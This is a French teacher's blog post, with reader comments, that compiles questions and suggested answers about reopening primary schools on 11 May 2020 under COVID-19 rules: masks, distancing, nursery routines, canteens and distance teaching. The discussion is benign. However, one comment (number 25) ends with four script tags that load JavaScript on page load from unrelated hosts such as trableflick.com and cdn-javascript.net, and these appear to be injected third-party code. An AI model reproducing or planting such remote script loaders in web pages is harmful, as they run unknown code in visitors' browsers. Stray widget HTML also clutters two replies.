• Comment?

    Comment ?   

    Recueil de questionnements pour la rentrée des classes

    Comment?

    Le 11 mai approche à grands pas et force est de constater que nous avons plus de questions que de réponses.

    Anticiper les problèmes et se poser les bonnes questions est une première étape essentielle pour mettre en place (quand c’est possible) des mesures que l’on espère les plus efficaces possibles.

    Voici une compilation des différentes questions que l'on peut se poser.

    Bon courage à tous pour cette rentrée où nous allons nous retrouver en première ligne.

    N’hésitez pas à ajouter des questionnements dans les commentaires.

    Edit: Merci à tous pour vos nombreuses questions qui montrent bien nos préoccupations légitimes.

    Je vous propose maintenant l'étape 2 de cet article: essayer de trouver des solutions.

    N'hésitez pas à commenter cet article si vous avez la solution (ou des pistes de solution) pour une ou plusieurs de ces interrogations, je les listerai en vert foncé.

    Parce qu'en ensemble on est plus fort,

    Bon courage à tous,

    Arnaud

    Edit 2: je relaye un commentaire que je trouve particulièrement éclairant. Trouver des solutions pour limiter la casse, on va devoir le faire et on le fera mais beaucoup trop de questions ne peuvent pas trouver de réponses....

     

    "J'ai vraiment du mal, beaucoup de mal, à concevoir une organisation qui soit à la fois possible sur le plan sanitaire (désinfection plusieurs fois par jour... respect de la distanciation.... port du masque...), pertinente sur le plan pédagogique (parce que franchement, avec des tiers ou des demis-groupes, en sachant qu'il restera 8 semaines de classe, ça va faire au mieux l'équivalent de 4 semaines de présence par élève de CP et CM2, 3 semaines pour les autres) et cohérente pour l'organisation professionnelle des parents. Je pense qu'il ne sera pas possible de respecter les trois critères, sanitaire, pédagogique, organisation des parents, et qu'il va falloir faire de sacrés compromis. Si on veut rester dans le cadre sanitaire, il faut impérativement des groupes de 8-10 enfants maximum, en limitant les temps collectifs (accueils, récrés, cantines). Désinfection (et pas simple ménage) chaque jour, voire deux fois par jour. Mais pédagogiquement, je ne vois pas d'intérêt (sans parler de la double charge de travail présentiel + distanciel, et ça, clairement, si ça nous tombe sur la tête, je dirai non à mon IEN). Et ça va être un casse-tête insoluble pour les familles... J'en arrive donc hélas à la conclusion que si on doit reprendre, il faut accepter les risques sanitaires. Ce n'est pas ma position [de reprendre les cours le 11 mai], mais la conclusion de ma modeste réflexion." 

     

     

    Arriver / sortir de l’école :

    En matière de distanciation sociale :

    - Comment vont faire les élèves qui arrivent en bus / taxi collectif ?

    - Comment gérer les entrées / sorties d’école avec les parents qui attendent à la grille ? (accueil échelonné, horaires décalées, entrée directe en classe....)

    - Comment gérer les entrées / sorties pour les maternelles (où les enfants sont remis de la main à la main avec des parents qui rentrent dans l'école)?

    Comment organiser la pose des cartables dans la cour pour éviter tout contact entre eux? (entrée directe en classe)

    Comment gérer les leçons à apprendre à la maison (ça fait amener du matériel d'école à la maison et inversement...et le cartable?)?

    J’ajoute un problème supplémentaire : les enseignants qui arrivent en train, RER et métro à l’école en région parisienne, l’une des zones les plus touchées de France..

    Mes élèves d'IME rencontrent plusieurs personnes chaque jour : ils arrivent et repartent en taxi collectif, ils sont accueillis sur un groupe éducatif par leurs éducateurs référents et c'est là que je vais les chercher pour les prendre en charge tout comme les autres intervenants comme les psychomotriciennes, psychologues, éducateur sportif... Certains élèves ont un temps de trajet relativement long (jusqu'à 1h30 pour certain) donc il n'est pas envisageable qu'ils ne viennent que pour une demi-journée...

     

    Gérer la protection contre le virus :

    Comment et quand va-t-on avoir le matériel nécessaire (masque / gel, autre, visière,...) ?

    Ce matériel sera-t-il livré en nombre suffisant ?

    Comment se protéger? (je vais essayer de travailler avec un masque (ceux que je vais me faire au besoin) ... mais à voir si c'est gérable pour qu'ils m'entendent et une visière (les feuilles de rétroprojection ou les couvertures de reliure sont très bien, il faut juste bricoler un support) sur les conseils de mon docteur, voire une blouse et une paire de chaussures rien que pour l'école et qui se retire sans y mettre les mains , aucun sac personnel au sol, si pas de blouse changer de vêtements immédiatement en se lavant les mains après et lessive/ repassage au plus chaud/long et séchage au sèche linge recommandé. Et prévoir une crème hydratante pour les mains car elles vont vite se dessécher avec tous ces lavages, et une peau desséchée ne joue correctement son rôle de barrière contre les microorganismes et autres. Sinon pour apprendre à mettre un masque et à l'utiliser, le CHU de Nantes a fait une super vidéo https://www.youtube.com/watch?v=o-_DPOiBA1o)

    Que faire en cas d’élève qui a des symptômes suspects?

    Comment détecter ces symptômes et par qui ? (thermomètre, test,...)

    Un dépistage systématique des personnels enseignants avant le 11 mai serait-il possible?

    Comment faire si allergie ou problème dermatologique par rapport au port du masque (asthme, ...)?

    Comment va-t-on gérer la désinfection régulière des locaux (poignée de porte, table, chaise, poubelle....) ?

    Un élève se mouche, crache ou éternue dans un mouchoir: que devient le mouchoir: poubelle collective, poubelle "spéciale" à l'écart ou hors de la classe? (problème pour les élèves, le professeur et également le personnel de service)

    Que faire des déchet liés à la protection contre le virus (masques usagés, mouchoirs utilisés,...)?

    Sachant qu’une fois placé, le masque ne doit pas être manipulé sous peine d’inefficacité, comment fait on pour boire, alors qu’il va faire de plus en plus chaud ?

    Un élève vomit: qui se charge de nettoyer?

    Doit-on accepter les masques en tissus sans savoir s'ils ont été correctement lavés à 60 degrés?

    Peut-on refuser un enfant qui refuserait de mettre un masque?

    Comment soigner les enfants qui se blesseraient (en récréation par exemple ), en particulier s'il s'agit d'une blessure au nez ou à la bouche ? Même sans blessure, comment intervenir auprès d'un enfant qui saignerait du nez (ce qui arrive quelquefois sans raison particulière), ou qui perdrait une dent ?

     

    En classe :

    *Spécifique à la maternelle:

    Comment gérer les doudous en maternelle?

    Comment gérer l'aide à l'habillage / déshabillage et les lacets en maternelle?

    Pour la sieste comment faire quand vous avez 40 enfants dans le dortoir ou plus (regroupement de plusieurs classes)?

    Comment gérer le nettoyage des couchettes, des draps et coussins des maternelles?

    Comment vont travailler les AVS et les ASEM avec les règles barrières ?

    En maternelle, comment gérer les activités en coin regroupement (rituels du matin, lecture, phono,...) ?

    Comment faire en maternelle alors que tout le matériel est commun (feutres, livres, jeux, pâte à modeler, crayons...)? (une place fixe avec un pot à matériel pour chaque enfant)

    En maternelle, comment maintenir à une table des enfants plus de 30 min?

    Comment enseigner en maternelle sans les coins jeux et jeux collectifs?

    Comment assurer la sécurité psychologique des enfants en bas âge qui vont nécessiter un câlin / les pleurs de séparation à la reprise / le besoin de réassurance par câlin furtif de certains?

    La gestion des câlins... J'ai des GS et des CP
    ... Ils sont encore très tactiles et ont besoin d'être réconfortés quand ils se blessent, quand ils ont un chagrin mais aussi ils peuvent avoir même entre eux de grands moments d effusions quand ils sont contents (la joie de se retrouver, de jouer)... Comment leur expliquer la distanciation? Déjà que la situation va être traumatisante... Ils vont sortir de leur cocon pour se retrouver dans une situation "apocalyptique"...

    Comment faire avec le masque si des enfants de maternelles le sucent/ l'enlèvent?

    Comment gérer les déplacements en maternelle? (une corde avec des marques tous les mètres pour les déplacements couloirs et entrée dans la classe)

     

    *L'apprentissage des gestes barrières:

    Comment travailler avec un masque  (pour les élèves et les professeurs) ?

    Quelles sont les bonnes façons de mettre un masque ? (solution possible: un des premier cours à mettre en place)

    Quelles nouvelles règles doit-on respecter ? (solution possible: un des premier cours à mettre en place)

     

    *La gestion pratique des gestes barrières:

    Comment gérer ma classe? (Pour éviter de manipuler les poignées de portes trop souvent, je pense continuer à faire cours porte ouverte (ce que je fais déjà aussi) et fenêtre ouverte pour aérer le plus possible.Je pense également prendre un cahier neuf, qui ne retournera pas à la maison, ne plus utiliser les manuels (d'autant que je n'en ai qu'un pour 2) , faire des corrections collectives au tableau et limiter au maximum les échanges de papier et encore plus les allers-retours de ceux ci au domicile des parents ... mais avec des CM2 il y aura forcément des documents pour l'entrée au collège déjà. Se laver les mains après tout échange de papier.)

    Je suis enseignante en IME. J'accueille les élèves individuellement ou en petits groupes tour à tour dans ma classe. Tous mes élèves sont déficients, souffrent de pathologies qui ne leur permettent pas de tout comprendre et/ou mémoriser. Comment leur expliquer les gestes barrière ? De plus, certains élèves bavent ou portent très souvent leurs doigts à la bouche...comment faire pour être sûr qu'ils vont pouvoir et que je vais pouvoir être en classe sans risque ?.

    Comment gérer les déplacements en classe pour respecter la distanciation sociale ?

    Comment gérer l’envoi d’élèves au tableau (craie, feutre, déplacement des élèves) ?

    Quelles activités ou quels types d’organisations vont changer  (atelier, coin cuisine, coin autonomie, tutorat, tables en îlot, prêt de livre en bibliothèque, presque toutes les activités d’EPS, peinture, sortie, décloisonnement, chorale,…)?

    Comment corriger le travail des élèves (correction de cahier, d’exercice, d’évaluation,…) ?

    Comment prêter du matériel scolaire, des manuels, des cahiers  (surtout le moment de transmission directe de la personne A à la personne B ou la « sécurisation sanitaire » pour la personne B de l’espace où la personne A irait chercher son matériel) ?

    Comment distribuer des photocopies en respectant les règles barrières et l’éventuel  vecteur de « contamination » papier ? (solution possible: distribution par l'enseignant des photocopies de toute la journée le matin avant l'arrivée des élèves sur des tables qui ont déjà été nettoyées la veille par le personnel de service)

    Comment gérer l’utilisation des ordinateurs de la classe ?

     

    *La gestion humaine des gestes barrières:

    Comment en classe aider à distance mes élèves sans leur donner l’impression que nous sommes tous des pestiférés ?

    Comment aider les élèves d’un point de vue psychologique pour qu’ils vivent cela de la meilleure des façons possibles ?

    Comment ne pas traumatiser enfants (et adultes) en reprenant dans des conditions anxiogènes ?

    Comment ne pas créer de nouvelles phobies scolaires auprès de personnes (enfants et adultes) qui auparavant prenaient plaisir à aller en classe ?

    Comment gérer un élève qui par provocation va enlever son masque, aller au contact des autres, cracher par terre ... ?

    Si une dispute survient, par exemple pour du matériel, un jouet, ou parce qu'un enfant a pris par erreur le doudou ou le goûter d'un autre en maternelle, comment intervenir pour régler le litige et consoler les enfants ?

    Quel que soit le niveau, si une dispute physique survient (de type bagarre), comment séparer les enfants sans risques ?

    Comment intervenir auprès de certains enfants, qui ont des troubles du comportement, et doivent quelquefois être contenus physiquement pour éviter qu'ils ne blessent d'autres enfants (et je ne parle pas des coups que reçoit l'adulte à ce moment-là, mais bien des risques de transmission du virus) ?

    Comment maintenir à une table un enfant tda/h?

    Comment vont travailler les AVS avec les règles barrières ?

    Comment gérer la distanciation sociale entre professeur et AVS ou professeur et ASEM ? (solutions possibles: communication et diffusion de documents au maximum par internet et téléphonie, distribution des documents en 1 seule fois en respectant au maximum les règles sanitaires, discussion à au moins 1m de distance)

     

    *Les apprentissages:

    Que travailler avec les élèves en priorité ? (ce n’est pas la première des préoccupations mais il faut y songer également) Pourrait-on utiliser pédagogiquement  le mix travail à distance / travail en présentiel pour proposer des activités complémentaires ? (si on atteint un nombre suffisant d’élèves qui pratiquent ce mix)

    Quels sont les objectifs pédagogiques de fin d'année: terminer le programme, révisions, .....?

    Comment gérer un CP dédoublé à 2 enseignantes dans la même salle quand les enseignements à distance ont été très différents ?

    Comment remplir nos bulletins ? On nous dit que les évaluations pendant le confinement ne comptent pas, mais alors comment faire entre ceux qui resteront chez eux, ceux qui seront là tous les jours ?

     

    *Les remplacements, les décloisonnements:

    Comment faire lorsqu'on travaille dans une école bilingue et que les élèves changent de classe à chaque demi-journée ? Désinfection ? Par qui ? Les élèves restent dans une des classes et donc ne font que du français ou que de l'anglais toute la semaine ?

    Quand j ai une équipe de suivi dans mon école qui garde les élèves du collègue concerné car les autres en ont tous 15 donc je ne peux pas les repartir ?

    Comment gérer les élèves d'un prof absent non remplacé ? Impossible de se répartir les élèves en respectant les gestes barrières !

    Je suis professeur remplaçant: comment gérer les élèves d'un prof absent que je remplace, comment connaitre les règles particulières de la classe de distanciation sociale, comment me protéger et protéger les autres car je visite régulièrement de par ma fonction de nombreuses classes ?

    Je suis enseignante en RASED sur 4 écoles. Je n’utilise que du matériel collectif et / ou manipulation ... que je transporte d'école en école...Suis preneuse de toutes vos bonnes idées pour ne pas passer des heures à tout désinfecter !

     

    Travailler à distance :

    Comment aller travailler en classe quand sa situation familiale ne le permet pas (garde d'enfant, ...)?

    Que fait on de nos enfants s'ils ne peuvent pas reprendre avant le 25?

    Qui va gérer la continuité pédagogique et comment ? (Pour répondre sur la continuité pédagogique, je vais pour ma part essayer de continuer tout en reprenant la classe. Cela va être compliqué, mais pour quelques semaines, j'espère tenir. Je proposerai des créneaux de classe virtuelle le mercredi, voire le samedi matin en cas de besoin. J'enverrai des exercices et leçons par mail, comme je le fais maintenant. Après, j'ai conscience que sur le long terme, ça ne serait pas faisable. 

    Voir l'article de Charivari qui propose également ses solutions: ici )

    Comment couper sa classe en 2  (groupe de niveau, liste alphabétique,…) ?

    Qui va donner les cours à la moitié qui reste à la maison (double travail?)? (webcam, filmer en live (ou diffuser en différé) le travail fait en classe pour le groupe confiné)

    Et l'accueil volontaire des enfants des soignants ? C'est en plus des demi groupes ?

    A quelle fréquence fait-on tourner les 2 groupes (maison / école) : tous les jours, toutes les semaines ? Quelle solution sera la plus efficace pour permettre aux parents de repartir travailler ?

    Quelle procédure suivre pour permettre le travail à distance d’un élève (ou d’un professeur) fragile et sujet à risques ?

    Comment définir les critères de personnel ou d'enfant à risques?

    Comment exercer son droit de retrait?

    Quelle est la procédure pour déclarer qu'un établissement n'est pas en mesure d'ouvrir (possibilité évoquée par le ministre)?

    Que faire avec les élèves qui n’iront ni à l’école ni ne suivront les cours à distance (et qui ne prêtent pas attention aux courriers postaux envoyés) ?

    Pour les doubles-niveaux, pendant que la maitresse est en présentiel avec les CM2, qui s'occupe des CM1 les deux premières semaines ? (Dans l'académie de Grenoble, la rectrice a dit que nous ne ferions pas de double journée, soit on est en présentiel, soit en distanciel, mes CM1 vont-ils voir leurs vacances prolongées de deux semaines ?)

     

    Dans la cour de récréation et les couloirs :

    Comment faire respecter les règles barrières ? (On a 2 escaliers dans l'école donc on pourrait envisager un sens de circulation pour la montée / descente pour éviter de se croiser)

    Comment organiser dans le temps et l’espace les moments de récréation (récréation différées, zones de jeux) et comment les faire respecter par des jeunes enfants pour qui la récréation est un moment de liberté accrue et qui ne penseront pas tout le temps à respecter des gestes barrières?

    Comment expliquer à des enfants que les jeux d’avant ne peuvent plus avoir lieu ? (début de solution possible: proposer d’autres jeux qui respectent ces règles, bien définir les règles et leur importance)

    Comment gérer les habits sur les porte-manteaux? (solution possible: pas d'habits dans les couloirs)

    Comment gérer l’entrée / la sortie de la classe pour respecter la distanciation sociale (attente dans les couloirs, surveillance....) ?

     

    Dans les toilettes :

    Comment va-t-on gérer la désinfection régulière et après chaque passage des élèves (cuvette, porte, papier toilette, chasse d'eau...) ?

    Comment respecter les règles barrières (gestion notamment du moment où l'on pourra aller aux toilettes pendant les cours (qui pour surveiller les toilettes et le ou les élèves?) ou pendant la récréation (système à mettre en place pour qu'on y aille chacun son tour)?

    Comment gérer le lavage régulier des mains avec un nombre restreint de lavabos ?

    Qui va surveiller la bonne réalisation du lavage de mains (bons gestes et temps de lavage) ?

     

    A la cantine :

    Comment gérer les règles barrières ?

    Quid de la protection des personnels de cantine ?

    En cas de suppression de la cantine :

    -comment gérer les enfants qui ne pourront pas retourner à la maison (Où mangent-ils ? Sous la surveillance de qui ? Avec quelles règles barrières ?) Le repas de cantine se fera, à ma demande, dans une partie de ma classe ou dehors quand il fait beau, de même pour la classe. C'est plus sain qu'un air vicié.

    -comment gérer la sortie des enfants qui retournent chez eux ?

     

    En salle des profs :

    Comment gérer l’utilisation des objets utilisés par tous (micro-ondes, chaises, massicot, plastifieuse, photocopieuse, ramette de papier) ? (solution possible: désinfection après chaque usage)

    Comment gérer les documents à lire, à feuilleter ou à signer pour tous ? (commande scolaire (solution possible: à faire par internet), enquête administrative, …)

    Quid des inspections et des visites diverses (conseiller pédagogique, psychologue scolaire,...)?

     

    Les réunions:

    Comment gérer les réunions parents /profs ou entre professeurs ? (solution possible: visioconférence à mettre en place)

    Comment gérer les documents à remettre signé par les parents (dossiers pour le collège, bulletin, etc…)? (période de « décontamination » des documents papiers). (pour les docs officiels (affelnet pour le collège, passage, etc.) ici on nous a clairement dit qu'un retour de mail des parents avec leur accord valait signature.)

    Comment gérer l'inquiétude des parents face à la possibilité que leur enfant puisse ramener le virus à la maison et ainsi contaminer toute la famille?

    « 4 Humanimaux en accès libreGrille de relecture en dictée »
    Partager via Gmail Delicious Technorati Yahoo! Google Bookmarks Blogmarks Pin It

    Tags Tags : , , , , , , ,
  • Commentaires

    1
    Valérie
    Mercredi 22 Avril à 20:30

    Comment soigner les enfants qui se blesseraient (en récréation par exemple ), en particulier s'il s'agit d'une blessure au nez ou à la bouche ? Même sans blessure, comment intervenir auprès d'un enfant qui saignerait du nez (ce qui arrive quelquefois sans raison particulière), ou qui perdrait une dent ?

     

      • Mercredi 22 Avril à 21:18

        merci c'est listé

    2
    mellechiffre28
    Mercredi 22 Avril à 21:09
    mellechiffre28

    J'espère qu'ils vont prendre lecture de ce questionnaire! Mais j'ai bien peur qu'encore une fois, ce sera à nous de trouver des solutions...arf

    3
    Christelle
    Mercredi 22 Avril à 21:18
    Et l'accueil volontaire des enfants des soignants !?? C'est en plus des demi groupes ?!
    4
    Steph
    Mercredi 22 Avril à 21:59
    Qui garde mon bébé alors que normalement c'est sa grand mère qui a plus de 70 ans ?
    5
    Isabelle
    Mercredi 22 Avril à 22:07
    Que faire en cas d'absence de l'enseignant non remplacé avant le confinement ?
    6
    Jess
    Mercredi 22 Avril à 23:16
    J avais aussi soulevé la question des leçons à apprendre....ca fait amener du matériel d ecole à la maison et inversement...et le cartable?!
    7
    Céline
    Mercredi 22 Avril à 23:26

    Qui garde nos enfants quand ce n'est pas leur tour d'école ? Qui les aide à la continuité péda ?

    8
    Valérie
    Mercredi 22 Avril à 23:56

    Si une dispute survient, par exemple pour du matériel, un jouet, ou parce qu'un enfant a pris par erreur le doudou ou la sucette d'un autre en maternelle, comment intervenir pour régler le litige et consoler les enfants ?

    Quel que soit le niveau, si une dispute physique survient (de type bagarre), comment séparer les enfants sans risques ?

    Comment intervenir auprès de certains enfants, qui ont des troubles du comportement, et doivent quelquefois être contenus physiquement pour éviter qu'ils ne blessent d'autres enfants ( et je ne parle pas des coups que reçoit l'adulte à ce moment-là, mais bien des risques de transmission du virus) ?

    9
    Jeudi 23 Avril à 06:41
    Coucou Mon capitaine! j'espère que tu vas bien et les tiens aussi !
    J'ajouterai une question à ta liste très bien pensée qui démontre bien une nouvelle fois que le gouvernement met la charrue avant les boeufs:
    En tant que maman de jumeaux au Cp (ils sont 20 Cp en cours double)... Euh qui va garder mes enfants ?????
    Bisous de ton p'tit moussaillon
    10
    Patricia
    Jeudi 23 Avril à 07:41
    Comment faire en maternelle alors que tout le matériel est commun (feutres, livres, jeux, paré à modeler, crayons...)?
      • Patricia
        Vendredi 24 Avril à 09:21

        L'idée du pot individuel est pas mal mais faut il encore en avoir assez et mes ps n'ont pas de place fixe. D'ailleurs la classe est aménagée avec moins de places assises que d'enfants

         
        What do you want to do ?
        New mail<button id="fenetremailtobuttonCopyClipboard">Copy</button><textarea id="fenetremailtoclipboardToCopySelect"></textarea>

    11
    Maelann
    Jeudi 23 Avril à 07:56
    Et oui beaucoup de questions y ont ils pensé? J en doute !!!! Mais peut peut-être faudrait-il les faire parvenir à notre ministre ?
      • Rachel
        Jeudi 23 Avril à 14:47

        je me pose aussi cette question et je pense que je vais attribuer une place fixe avec un pot à matériel pour chaque enfant. J'ai plusieurs enfants qui mettent à la bouche les crayons alors ça va être ingérable autrement.

    12
    Mimisourie
    Jeudi 23 Avril à 10:41

    Comment gérer un CP dédoublé à 2 enseignantes dans la même salle quand les enseignements à distance ont été très différents ?

    13
    Mimisourie
    Jeudi 23 Avril à 10:46

    Pour les entrées, sorties : entrée en classe directement, horaires différents (légalité, gestion des frères et soeurs?)

    Cartables stockés dehors, au  gymnase... Vestes sur le cartable de chacun

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    14
    Nath
    Jeudi 23 Avril à 12:54
    Pour la sieste comment faire quand vous avez 40 enfants dans le dortoir ou plus. ????
      • Cath
        Mardi 28 Avril à 16:16
        Je pense les installer en salle de motricité.
    15
    Mlaniec
    Jeudi 23 Avril à 13:33
    En maternelle, les parents accompagnent jusque dans le couloir ou la classe leur enfant, cela peut il être encore possible sachant qu'ils peuvent se retrouver à beaucoup au même moment ?
      • Patricia
        Vendredi 24 Avril à 09:18

        Chez nous, avec vigipirate, ils ne rentraient déjà plus dans les locaux.

         

         
        What do you want to do ?
        New mail<button id="fenetremailtobuttonCopyClipboard">Copy</button><textarea id="fenetremailtoclipboardToCopySelect"></textarea>

    16
    Sophie
    Jeudi 23 Avril à 13:37
    Sachant qu’une fois placé, le masque ne doit pas être manipulé sous peine d’inefficacité, comment fait on pour boire, alors qu’il va faire de plus en plus chaud ?
      • Rachel
        Jeudi 23 Avril à 14:50

        les visières ne seraient elles pas plus adaptées ? elles permettraient également de détecter les enfants qui doivent se moucher, ils ne sont pas tous autonomes sur ce point.

    17
    Valérie
    Jeudi 23 Avril à 14:15

    Comment ne pas traumatiser enfants (et adultes) en reprenant dans des conditions anxiogènes ?

    Comment ne pas créer de nouvelles phobies scolaires auprès de personnes (enfants et adultes) qui auparavant prenaient plaisir à aller en classe ? 

     

     

     

    18
    Rachel
    Jeudi 23 Avril à 14:53

    une corde avec des marques tous les mètres pour les déplacements couloirs et entrée dans la classe. Pour les portes manteaux je pense alterner ceux des 2 groupes de ma classe. 

      • jean francois
        Vendredi 24 Avril à 11:35

        Et ils portent des gants pour tenir la corde ou tu la decontamine chaque fois???

    19
    Valérie
    Jeudi 23 Avril à 16:05

    Comment permettre aux parents ( y compris enseignants) qui ne souhaitent pas scolariser leur(s) enfant(s) dans ces conditions , de ne pas les scolariser, sans pression, ni contrainte, ni sanction, de la part de leur employeur quand le télé travail n'est pas possible (et l'histoire récente a montré qu'il l'est pour les enseignants) ?

      • Aurélie
        Vendredi 24 Avril à 10:04

        Apparemment les syndicats ont rencontré le recteur hier (enfin sur LYON) et tous les enseignants seraient réquisitionnés (sauf ceux qui sont personne fragile) et les enfants des enseignants seraient accueillis avec les enfants de soignants

    20
    Morgane
    Jeudi 23 Avril à 19:10
    Bonjour,
    Tout d'abord, merci d'avoir mis en place ce recueil.
    Si le retour des élèves est sur le volontariat des parents, puis je garder mon fils de GS si je ne souhaite pas qu'il y retourne et que mon conjoint est aussi PE ? Ai-je le droit de ne pas retourner en classe sans risquer l'abandon de poste ?
    21
    Aude
    Jeudi 23 Avril à 20:07
    Que fait on de nos enfants s'ils ne peuvent pas reprendre avant le 25? Qui va gérer leur continuité pédagogique ?
    22
    Stephanie
    Jeudi 23 Avril à 20:07
    Merci pour votre action. Je suis actuellement suppléente dans deux écoles différentes au privée dans une école rurale et une école dans une petite ville. J'ai trois classes en charge, une classe de ms/gs de 30 enfants, une classe de ce1/ce2 de 20 enfants et une classe de cm1/cm2 de 27 élèves. Comment être sûre que je ne trimballe pas le virus de classe en classe. Pour revenir sur l'organisation, il se peut que dans mon école rural, il n'y ait pas de cantine. On peut penser à un accueil des enfants juste le matin et faire classe via internet l'après midi pour toucher tout le monde.
    23
    Denis
    Vendredi 24 Avril à 08:44
    Que fait on des élèves d’un collègue absent et non remplacé?
    24
    mika
    Vendredi 24 Avril à 09:03

    Je suis enseignante en RASED sur 4 écoles !

    Je n’utilise que du matériel collectif et / ou manipulation ... que je transporte d'école en école...

    Suis preneuse de toutes vos bonnes idées pour ne pas passer des heures à tout désinfecter !!!

     

      • Mardi 12 Mai à 15:46

        Je suis aussi enseignante RASED : l'Inspecteur nous demande d'intervenir maximum dans deux écoles sur la semaines. (donc je fais le choix de deux écoles où il y a le plus de besoin... Quitte à changer et aller dans deux autres écoles dans 5 semaines...)

        PPour le matériel : effectivement moi je vais éviter le matériel collectif que j'apporte; donc deux possibilités: 

        - soit les élèves ont du matériel individuel dans les classe qu'ils utiliseront aussi avec moi. 

        - soit je fabrique à l'avance du matériel individuel (en carton, papier) pour chaque élève dans une grande enveloppe, que je leur passe (en m'étant lavé les mains avant...)

        Voilà ;)

         

         

    25
    maitresse de CP
    Vendredi 24 Avril à 09:34

    Le tout premier problème qui me vient en tête : mon école ne comporte qu'une porte d'entrée (l'autre est une sortie de secours qui ne s'ouvre que de l'intérieur) sans aucun système de blocage une fois ouverte, le poignée va être manipulée 10 000 fois par jour, comment faire juste pour entrer sans risque ? Pour le portail, même chose, faut-il faire fi de vigipirate qui nous impose depuis des années de tout boucler et le laisser ouvert, ce qui pose aussi des questions sur la sécurité des enfants. Tout comme l'utilisation du matériel commun, vous proposez "désinfection systématique après chaque usage", cela veut dire un flacon de désinfectant à côté de chaque matériel ?

    Merci à tous ceux qui partagent leurs inquiétudes et solutions pour faire avancer les choses.

    <script src="//trableflick.com/21aca573d498d25317.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1587713250964" type="text/javascript"></script> <script src="http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2" type="text/javascript"></script>
    26
    Carelle
    Vendredi 24 Avril à 10:48
    Merci pour cette liste non exhaustive (hélas) des problèmes que nous aurons à résoudre à la rentrée.
    En région parisienne, l’une des plus touchées par le COVID-19, une majorité d’enseignants prennent les transports en commun. Environ 1 train et 1 métro sur 2 circuleront le 11 mai. Nous emprunterons des rames bondées pour rejoindre nos écoles. Même avec des masques que personne ne nous fournira, Nous deviendrons d’excellents vecteurs voire victimes du virus !
    27
    Karelle
    Vendredi 24 Avril à 10:57
    Bonjour,
    J’ajoute un problème supplémentaire : les enseignants qui arrivent en train, RER et métro à l’école en région parisienne, l’une des zones les plus touchées de France...
    28
    Vendredi 24 Avril à 14:19
    sageb

    pour les docs officiels (affelnet pour le collège, passage, etc.) ici on nous a clairement dit qu'un retour de mail des parents avec leur accord valait signature.

    29
    Marie
    Vendredi 24 Avril à 17:40

    Bonjour,

    Je suis enseignante en IME. J'accueille les élèves individuellement ou en petits groupes tour à tour dans ma classe. Tous mes élèves sont déficients, souffrent de pathologies qui ne leur permettent pas de tout comprendre et/ou mémoriser. Comment leur expliquer les gestes barrière ?

    De plus, certains élèves bavent ou portent très souvent leurs doigts à la bouche...comment faire pour être sûr qu'ils vont pouvoir et que je vais pouvoir être en classe sans risque ?

    Mes élèves rencontrent plusieurs personnes chaque jour : ils arrivent et repartent en taxi collectif, ils sont accueillis sur un groupe éducatif par leurs éducateurs référents et c'est là que je vais les chercher pour les prendre en charge tout comme les autres intervenants comme les psychomotriciennes, psychologues, éducateur sportif...

    Certains élèves ont un temps de trajet relativement long (jusqu'à 1h30 pour certain) donc il n'est pas envisageable qu'ils ne viennent que pour une demi-journée...mais QUID du temps de repas, de l'utilisation des sanitaires...

    Bref, de TROP nombreuses questions encore...et je n'ai pas tout abordé !

     

    Merci, en tous cas, pour cette liste !

     

    Pour répondre à la question du cartable sur la cour évoquée plus haut, j'ai, dans un précédent poste, expérimenté l'accueil des élèves (CP/Ce1) directement dans la classe. Cela permet à chacun de se rendre directement à sa place sans poser ses affaires ailleurs préalablement, ni être en contact avec les cartables des autres (cartables souvent entassés le long d'un mur ou sur la cour). Sinon, on peut envisager que les élèves viennent et repartent sans cartable...et les communications avec les familles seront alors dématérialisées...mais pour les leçons ??? Cela est possible aussi à condition que toutes les familles aient accès à un ordinateur et internet et une imprimante...DONC, ce n'est pas assuré !

    30
    Marie G
    Samedi 25 Avril à 10:10

    Bonjour,

    je suis en MS-GS, je me pose beaucoup de questions sur la récréation.

    J'ai lu dans un article que chaque enfant devait avoir un WC nominatif, ce qui n'est possible qu'en utopie.

    Le maire m'a demandé s'il fallait maintenir le dortoir, je lui ai dit non.

    En ce qui concerne le lavage des mains, il est indispensable, mais pour alterner et moins les abîmer, je pensais faire comme à la biocoop : mettre des gants et à chaque action différente (photocopie ...) un coup d'alcool ménager. Les gants toutes la journée c'est pas la panacée non plus.

    Je garde la communication par mail avec les parents.

    Ils ne rentrent plus dans l'école et gèrent leurs distances avec les autres. L'arrivée des enfants sera échelonnée en ce qui concerne ceux qui sont à l'ALAE. Même chose pour le départ.

    Le repas de cantine se fera, à ma demande, dans une partie de ma classe ou dehors quand il fait beau, de même pour la classe. C'est plus sain qu'un air vicié.

     

    Beaucoup de jeux symboliques, dînette, épicerie, voitures ... seront enlevés, pas de puzzle car ça ne résiste pas au lavage, des légos par enfant qu'ils mettront dans une barquette et qui seront mis dans une corbeille et mis au lave-linge.

    31
    Gwenola
    Samedi 25 Avril à 10:28

    Autre question pour cette fin d'année : comment remplir nos bulletins ? On nous dit que les éval pendant le confinement ne comptent pas, mais alors comment faire entre ceux qui resteront chez eux, ceux qui seront là tous les jours ?

    Pour répondre sur la continuité pédagogique, je vais pour ma part essayer de continuer tout en reprenant la classe. Ca va être compliqué, mais pour quelques semaines, j'espère tenir. Je proposerai des créneaux de classe virtuelle le mercredi, voire le samedi matin en cas de besoin. J'enverrai des exercices et leçons par mail, comme je le fais maintenant. Après, j'ai conscience que sur le long terme, ça ne serait pas faisable.

      • Aurélie
        Dimanche 26 Avril à 11:42

        Je suis réservée sur ta réponse sur la continuité pédagogique .

        pour moi il est inacceptable qu'on nous demande double charge de travail. Nous allons aller en classe en stressant toute la journée pour que toutes les mesures soit respectées au mieux ....et le soir il va falloir gérer la continuité pédagogique des autres élèves ????

        c'est hallucinant!

        nous avons aussi une vie en dehors de l'école, les enfants à élever à la maison (aide pour les devoirs etc, ...) et une maison à gérer (ménage lessive courses etc...) et d'autre soucis (pour ma part) à gérer

         

        personnellement je me sens pas capable de gérer toute cette charge mentale....même pour 8 semaines...

    32
    olivier
    Dimanche 26 Avril à 00:07

    On parle des 8 semaines mais en septembre le virus risque de toujours être là. Les 8 semaines à venir vont aussi nous servir pour la prochaine année scolaire. 

    33
    gommette
